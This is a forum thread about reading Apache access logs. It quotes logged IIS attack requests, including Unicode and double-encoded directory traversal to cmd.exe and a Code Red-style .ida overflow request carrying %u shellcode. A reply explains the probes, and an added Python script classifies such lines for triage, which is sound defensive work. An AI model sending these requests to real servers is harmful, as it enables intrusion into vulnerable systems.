Troumad wrote:

I'm taking advantage of this thread about logs to look at mine.
I've got as far as /var/log/httpd/access_log

I'm seeing lots of things like:
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:39 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:39 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 418 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 418 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"
68.38.238.151 - - [22/Sep/2003:07:12:35 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 401 593 "-" "-"


Are these virus attacks against Windows systems?
This really makes me want to change where the server sits in the computer tree!


These are typical attacks used against Krosoft's IIS servers (Unicode flaw that allows getting a remote "shell" and, for example, listing your C:\).
Of course it's totally ineffective against your Apache ;-)


See you soon
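
Added example, not part of the original messages: a Python triage script for access_log lines like the ones quoted above. It tags overlong UTF-8 path separators, double percent-encoding and `.ida` requests carrying `%u` data, then checks whether any tagged request got a non-error status. The tag names, the helper functions and the benign sample line are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Apache combined log: host ident user [time] "METHOD uri proto" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Overlong 2-byte UTF-8 forms of "/" and "\" as they appear in the logged requests
OVERLONG = re.compile(rb'\xc0[\x2f\xaf]|\xc1[\x1c\x9c]')

def decode_layers(raw, limit=4):
    """Percent-decode until stable; return (bytes, number of passes that changed them)."""
    data = raw.encode('utf-8')
    for passes in range(limit):
        nxt = unquote_to_bytes(data)
        if nxt == data:
            return data, passes
        data = nxt
    return data, limit

def classify(line):
    """Tag one access_log line; returns None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, uri, status = m.group(1), m.group(2), int(m.group(3))
    path, _, query = uri.partition('?')
    data, passes = decode_layers(path)
    tags = set()
    if OVERLONG.search(data):
        tags.add('overlong-utf8-separator')
    if passes > 1:  # e.g. %252f -> %2f -> /
        tags.add('double-encoded')
    # Treat overlong forms and backslashes as "/" before looking for traversal
    norm = OVERLONG.sub(b'/', data).replace(b'\\', b'/').lower()
    if b'../' in norm and norm.endswith(b'cmd.exe'):
        tags.add('traversal-to-cmd.exe')
    if path.lower().endswith('.ida') and '%u' in query:
        tags.add('ida-%u-payload')
    return {'host': host, 'status': status, 'tags': sorted(tags)}

def report(lines):
    probes = [r for r in map(classify, lines) if r and r['tags']]
    return probes, [r for r in probes if r['status'] < 400]  # second list: probes answered without an error

# Lines 1-2 are copied from the post, line 3 is shortened from it,
# line 4 is a constructed benign request for contrast.
SAMPLE = [
    r'213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"',
    r'213.119.26.92 - - [21/Sep/2003:21:10:39 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 418 "-" "-"',
    r'68.38.238.151 - - [22/Sep/2003:07:12:35 +0200] "GET /default.ida?XXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 401 593 "-" "-"',
    r'10.0.0.5 - - [22/Sep/2003:08:00:00 +0200] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]
```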

